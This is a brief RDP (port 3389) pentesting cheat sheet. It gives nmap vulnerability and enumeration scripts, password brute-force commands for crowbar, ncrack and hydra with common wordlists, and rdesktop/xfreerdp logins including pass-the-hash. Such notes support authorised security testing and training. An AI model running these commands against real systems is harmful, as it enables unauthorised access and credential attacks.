3389 - Pentesting rdp
nmap
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 -Pn $IP
/opt/tools/impacket/examples/rdp_check.py $IP
bruteforce - crowbar
crowbar --server $IP -b rdp -u pedro -C /usr/share/nmap/nselib/data/passwords.lst -vv
crowbar --server $IP -b rdp -U /usr/share/nmap/nselib/data/usernames.lst -C /usr/share/nmap/nselib/data/passwords.lst -vv
bruteforce - ncrack
ncrack -vv --user chris -P /usr/share/wordlists/rockyou.txt rdp://$IP
ncrack -vv -U user.txt -P /usr/share/wordlists/rockyou.txt rdp://$IP
bruteforce - hydra
hydra -V -f -l pedro -P /usr/share/nmap/nselib/data/passwords.lst rdp://$IP
hydra -V -f -L /usr/share/nmap/nselib/data/usernames.lst -P /usr/share/nmap/nselib/data/passwords.lst rdp://$IP
Connect with known credentials/hash
rdesktop $IP -u <username>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>
xfreerdp /u:admin /p:123456 /cert:ignore /v:10.11.1.7 /w:2000 /h:900